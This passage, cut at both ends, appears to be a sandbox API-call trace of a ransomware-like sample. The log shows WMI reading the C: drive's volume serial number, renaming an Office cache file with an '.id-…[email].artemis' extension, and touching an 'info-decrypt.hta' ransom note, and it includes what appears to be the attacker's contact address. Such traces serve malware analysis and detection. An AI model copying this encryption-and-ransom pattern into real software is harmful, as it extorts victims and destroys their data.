Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4bc | out: ppvObject=0x69de4bc*=0x6738bd0) returned 0x0 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de478 | out: ppvObject=0x69de478*=0x0) returned 0x80004002 [0192.166] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dddd4 | out: ppvObject=0x69dddd4*=0x0) returned 0x80004002 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddd84 | out: ppvObject=0x69ddd84*=0x0) returned 0x80004002 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddd90 | out: ppvObject=0x69ddd90*=0x7ae590) returned 0x0 [0192.166] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae590, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddd98 | out: pCid=0x69ddd98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.166] WbemDefPath:IUnknown:Release (This=0x7ae590) returned 0x3 [0192.166] CoGetContextToken (in: pToken=0x69dddf0 | out: pToken=0x69dddf0) returned 0x0 [0192.166] CoGetContextToken (in: pToken=0x69de1f8 | out: pToken=0x69de1f8) returned 0x0 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de288 | out: ppvObject=0x69de288*=0x0) returned 0x80004002 [0192.166] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0192.166] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0192.166] CoGetContextToken (in: pToken=0x69deb80 | out: pToken=0x69deb80) returned 0x0 [0192.166] CoGetContextToken (in: pToken=0x69deae0 | out: pToken=0x69deae0) returned 0x0 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x69debb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69debac | out: ppvObject=0x69debac*=0x6738bd0) returned 0x0 [0192.166] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0192.167] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0192.167] WbemDefPath:IWbemPath:SetText (This=0x6738bd0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0192.167] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x69ded30 | out: puCount=0x69ded30*=0x2) returned 0x0 [0192.167] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x69ded2c*=0x0, pszText=0x0 | out: puBuffLength=0x69ded2c*=0xf, pszText=0x0) returned 0x0 [0192.167] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x69ded2c*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded2c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.167] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded30 | out: ppv=0x69ded30*=0x72015c) returned 0x0 [0192.167] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded28 | out: pAptType=0x69ded28*=1) returned 0x0 [0192.167] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded2c | out: ppvObject=0x69ded2c*=0x0) returned 0x80004002 [0192.167] IUnknown:Release (This=0x72015c) returned 0x1 [0192.168] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de950 | out: ppv=0x69de950*=0x672f2e0) returned 0x0 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x672f2e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69deb68 | out: ppvObject=0x69deb68*=0x0) returned 0x80004002 [0192.168] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f2e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb7c | out: ppvObject=0x69deb7c*=0x67370e8) returned 0x0 [0192.168] WbemLocator:IUnknown:Release (This=0x672f2e0) returned 0x0 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de79c | out: ppvObject=0x69de79c*=0x67370e8) returned 0x0 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de758 | out: ppvObject=0x69de758*=0x0) returned 0x80004002 [0192.168] WbemLocator:IUnknown:AddRef (This=0x67370e8) returned 0x3 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de0b4 | out: ppvObject=0x69de0b4*=0x0) returned 0x80004002 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69de064 | out: ppvObject=0x69de064*=0x0) returned 0x80004002 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de070 | out: ppvObject=0x69de070*=0x0) returned 0x80004002 [0192.168] CoGetContextToken (in: pToken=0x69de0d0 | out: pToken=0x69de0d0) returned 0x0 [0192.168] CoGetContextToken (in: pToken=0x69de4d8 | out: pToken=0x69de4d8) returned 0x0 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de568 | out: ppvObject=0x69de568*=0x0) returned 0x80004002 [0192.168] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x2 [0192.168] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x1 [0192.168] CoGetContextToken (in: pToken=0x69deb48 | out: pToken=0x69deb48) returned 0x0 [0192.168] CoGetContextToken (in: pToken=0x69deaa8 | out: pToken=0x69deaa8) returned 0x0 [0192.168] WbemLocator:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x69deb78*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69deb74 | out: ppvObject=0x69deb74*=0x67370e8) returned 0x0 [0192.168] WbemLocator:IUnknown:AddRef (This=0x67370e8) returned 0x3 [0192.168] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x2 [0192.168] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x69ded0c | out: puCount=0x69ded0c*=0x2) returned 0x0 [0192.169] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x69ded08*=0x0, pszText=0x0 | out: puBuffLength=0x69ded08*=0xf, pszText=0x0) returned 0x0 [0192.169] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x69ded08*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.169] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x69debe4 | out: ppv=0x69debe4*=0x6736f28) returned 0x0 [0192.169] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736f28, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x69dec78 | out: ppNamespace=0x69dec78*=0x6748264) returned 0x0 [0193.520] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb14 | out: ppvObject=0x69deb14*=0x781544) returned 0x0 [0193.521] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781544, pProxy=0x6748264, pAuthnSvc=0x69deb64, pAuthzSvc=0x69deb60, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c, pImpLevel=0x69deb4c, pAuthInfo=0x69deb50, pCapabilites=0x69deb54 | out: pAuthnSvc=0x69deb64*=0xa, pAuthzSvc=0x69deb60*=0x0, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c*=0x6, pImpLevel=0x69deb4c*=0x2, pAuthInfo=0x69deb50, pCapabilites=0x69deb54*=0x1) returned 0x0 [0193.521] WbemLocator:IUnknown:Release (This=0x781544) returned 0x1 [0193.521] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb08 | out: ppvObject=0x69deb08*=0x781564) returned 0x0 [0193.521] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb04 | out: ppvObject=0x69deb04*=0x781544) returned 0x0 [0193.521] WbemLocator:IClientSecurity:SetBlanket (This=0x781544, pProxy=0x6748264, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0193.521] WbemLocator:IUnknown:Release (This=0x781544) returned 0x2 [0193.521] WbemLocator:IUnknown:Release (This=0x781564) returned 0x1 [0193.521] CoTaskMemFree (pv=0x77e118) [0193.521] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x0 [0193.521] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de704 | out: ppvObject=0x69de704*=0x781564) returned 0x0 [0193.521] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de6c0 | out: ppvObject=0x69de6c0*=0x0) returned 0x80004002 [0193.526] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de4dc | out: ppvObject=0x69de4dc*=0x0) returned 0x80004002 [0193.528] WbemLocator:IUnknown:AddRef (This=0x781564) returned 0x3 [0193.528] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de01c | out: ppvObject=0x69de01c*=0x0) returned 0x80004002 [0193.593] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddfcc | out: ppvObject=0x69ddfcc*=0x0) returned 0x80004002 [0193.594] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddfd8 | out: ppvObject=0x69ddfd8*=0x7814c4) returned 0x0 [0193.594] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7814c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddfe0 | out: pCid=0x69ddfe0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.594] WbemLocator:IUnknown:Release (This=0x7814c4) returned 0x3 [0193.594] CoGetContextToken (in: pToken=0x69de038 | out: pToken=0x69de038) returned 0x0 [0193.595] CoGetContextToken (in: pToken=0x69de440 | out: pToken=0x69de440) returned 0x0 [0193.595] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4d0 | out: ppvObject=0x69de4d0*=0x78154c) returned 0x0 [0193.595] WbemLocator:IRpcOptions:Query (in: This=0x78154c, pPrx=0x781564, dwProperty=2, pdwValue=0x69de4f8 | out: pdwValue=0x69de4f8) returned 0x80004002 [0193.595] WbemLocator:IUnknown:Release (This=0x78154c) returned 0x3 [0193.595] WbemLocator:IUnknown:Release (This=0x781564) returned 0x2 [0193.595] CoGetContextToken (in: pToken=0x69dea18 | out: pToken=0x69dea18) returned 0x0 [0193.595] CoGetContextToken (in: pToken=0x69de978 | out: pToken=0x69de978) returned 0x0 [0193.595] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x69dea48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x69dea44 | out: ppvObject=0x69dea44*=0x6748264) returned 0x0 [0193.595] WbemLocator:IUnknown:AddRef (This=0x6748264) returned 0x4 [0193.595] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x3 [0193.595] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x2 [0193.595] SysStringLen (param_1=0x0) returned 0x0 [0193.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x69deddc | out: puCount=0x69deddc*=0x0) returned 0x0 [0193.595] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x69dedd8*=0x0, pszText=0x0 | out: puBuffLength=0x69dedd8*=0x20, pszText=0x0) returned 0x0 [0193.595] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x69dedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.595] CoGetContextToken (in: pToken=0x69dea48 | out: pToken=0x69dea48) returned 0x0 [0193.595] WbemLocator:IUnknown:AddRef (This=0x781564) returned 0x3 [0193.595] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de8dc | out: ppvObject=0x69de8dc*=0x781564) returned 0x0 [0193.595] WbemLocator:IUnknown:Release (This=0x781564) returned 0x3 [0193.596] WbemLocator:IUnknown:Release (This=0x781564) returned 0x2 [0193.596] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x69dede0*=0x0, pszText=0x0 | out: puBuffLength=0x69dede0*=0x20, pszText=0x0) returned 0x0 [0193.596] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x69dede0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.596] IWbemServices:GetObject (in: This=0x6748264, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x69ded94*=0x0, ppCallResult=0x0 | out: ppObject=0x69ded94*=0x673bac8, ppCallResult=0x0) returned 0x0 [0195.306] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x69ded94 | out: puCount=0x69ded94*=0x2) returned 0x0 [0195.306] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x69ded90*=0x0, pszText=0x0 | out: puBuffLength=0x69ded90*=0xf, pszText=0x0) returned 0x0 [0195.307] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x69ded90*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded90*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.307] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x348c66c*=0, plFlavor=0x348c670*=0 | out: pVal=0x69ded90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x348c66c*=8, plFlavor=0x348c670*=0) returned 0x0 [0195.321] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.321] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.322] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x348c66c*=8, plFlavor=0x348c670*=0 | out: pVal=0x69ded98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x348c66c*=8, plFlavor=0x348c670*=0) returned 0x0 [0195.339] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.347] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.354] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0195.354] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x76 [0195.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedf8) returned 1 [0195.372] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x69dee74 | out: lpFileInformation=0x69dee74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1a1bf4a0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x264020)) returned 1 [0195.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedf4) returned 1 [0195.372] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0195.376] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0195.376] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0195.376] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0195.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee9c) returned 1 [0195.376] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x69def18 | out: lpFileInformation=0x69def18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe2af0c0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe2af0c0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe393900, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0195.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee98) returned 1 [0195.376] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x69de9b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0195.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee64) returned 1 [0195.376] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x348cef4 | out: lpFileInformation=0x348cef4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0195.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee60) returned 1 [0195.377] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x69de8a4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0195.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded98) returned 1 [0195.377] CreateFileW 